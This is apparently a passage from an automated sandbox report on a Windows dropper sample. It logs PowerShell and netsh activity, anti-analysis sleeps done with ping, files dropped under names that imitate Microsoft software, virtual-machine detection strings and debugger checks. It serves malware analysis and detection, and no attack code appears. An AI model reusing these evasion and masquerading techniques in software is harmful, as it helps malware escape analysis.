Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeMemory allocated: 21C1BE90000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeMemory allocated: 21C357E0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeMemory allocated: 21C3E140000 memory reserve | memory write watchJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeMemory allocated: 1B9E5C80000 memory reserve | memory write watchJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeMemory allocated: 1B9FF4B0000 memory reserve | memory write watchJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeMemory allocated: 21252AF0000 memory reserve | memory write watchJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeMemory allocated: 2126C4F0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeWindow / User API: threadDelayed 1222Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeWindow / User API: threadDelayed 853Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5739Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3971Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1417Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 2561
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 539
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 764
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1803
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_hashlib.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_tests.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\unicodedata.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_ctypes.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_socket.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\lapack_lite.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_bounded_integers.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\opencv_videoio_ffmpeg480.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\pyexpat.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\mtrand.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\_umath_linalg.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_mt19937.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\psutil\_psutil_windows.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\fft\_pocketfft_internal.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\bit_generator.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\netifaces.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_common.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\python37.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_lzma.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\cv2.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\python3.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_sfc64.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_bz2.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_umath.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_ssl.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\select.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_pcg64.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_generator.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\libssl-1_1.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_philox.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_elementtree.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe TID: 5100Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe TID: 6932Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968Thread sleep count: 5739 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968Thread sleep count: 3971 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exe TID: 5476Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep count: 1417 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep count: 539 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5236Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484Thread sleep count: 764 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6880Thread sleep count: 127 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3260Thread sleep count: 1803 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep count: 100 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\PING.EXELast function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Amcache.hve.22.drBinary or memory string: VMware
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeBinary or memory string: #(VmCIJ
Source: Amcache.hve.22.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.22.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.22.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.22.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.22.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.22.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.22.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.22.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.22.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.22.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.22.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: netsh.exe, 0000001D.00000002.2060794340.000002BF320C7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001D.00000003.2059762065.000002BF320C4000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000020.00000003.2143575388.000001C2804D5000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000023.00000003.2252352867.0000017EA7EA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.22.drBinary or memory string: vmci.sys
Source: Amcache.hve.22.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.22.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.22.drBinary or memory string: \driver\vmci,\driver\pci
Source: netsh.exe, 00000017.00000002.1979187876.0000023570068000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: Amcache.hve.22.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.22.drBinary or memory string: VMware20,1
Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.22.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.22.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.22.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.22.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.22.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.22.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.22.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.22.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.22.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess queried: DebugPortJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
